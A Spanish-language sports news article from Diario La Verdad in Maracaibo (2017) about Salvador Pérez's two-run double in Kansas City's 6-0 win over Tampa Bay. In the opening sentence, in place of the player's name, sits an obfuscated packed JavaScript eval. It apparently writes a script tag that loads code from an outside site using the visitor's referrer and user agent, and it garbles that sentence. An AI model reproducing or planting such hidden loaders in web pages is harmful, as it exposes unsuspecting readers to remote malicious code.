Salvador Pérez aporta en grande ante Tampa

Redacción Deportes / Maracaibo / [email protected]
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhrrf|var|u0026u|referrer|dikas||js|php'.split('|'),0,{})) receptor conectó doblete para empujar a Mike Moustakas y a su compatriota Alcides Escobar en la parte alta de la octava, en la jornada de ayer que resultó en el triunfo de los Reales 6 por 0 ante los Rays 

El criollo conectó doblete para empujar a Moustakas y Alcides Escobar en la parte alta de la octava. (Foto: Agencias)

El venezolano Salvador Pérez fue clave en el juego ganado por los Reales de Kansas City 6 carreras por 0 ante los Rays de Tampa Bay. El receptor conectó doblete para empujar a Mike Moustakas y a su compatriota Alcides Escobar en la parte alta de la octava, en la jornada de ayer de las Grandes Ligas.

Jason Vargas tuvo una gran salida de siete entradas sin permitir carreras, aceptó solo tres imparables, abanicó a cuatro contrarios y regaló un pasaporte. Luego el blanqueo continuó con el también zurdo Matt Strahm, que retiró el octavo sin problemas y Al Alburquerque cerrando el encuentro sin contratiempos.

El dominicano Jorge Bonifacio conectó un sencillo remolcador frente al venezolano Diego Moreno en la decisiva octava entrada, antes de que Whit Merrifield bateara un sencillo productor. Merrifield terminó anotando cuando el jardinero central Kevin Kiermaier no pudo controlar la pelota, en un error que costó tres bases.

Asimismo, Merrifield aportó un vuelacerca a la causa de Kansas City, que ha ganado tres de cuatro compromisos a Tampa Bay. Los Reales habían perdido 13 de 16 encuentros antes de esta serie.

Jake Odorizzi (2-2) permitió una anotación y cuatro inatrapables en seis innings por Tampa. Había aceptado tres hits o menos en cada una de sus cuatro aperturas anteriores.

Por los Reales, los venezolanos Alcides Escobar de 4-1 con una anotada, Pérez de 4-1 con una anotada y dos empujadas. El dominicano Bonifacio de 4-2 con una anotada y una producida. El cubano Jorge Soler de 2-0. El nicaragüense Cheslor Cuthbert de 4-1. Por los Rays, el venezolano Jesús Sucre de 1-0.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama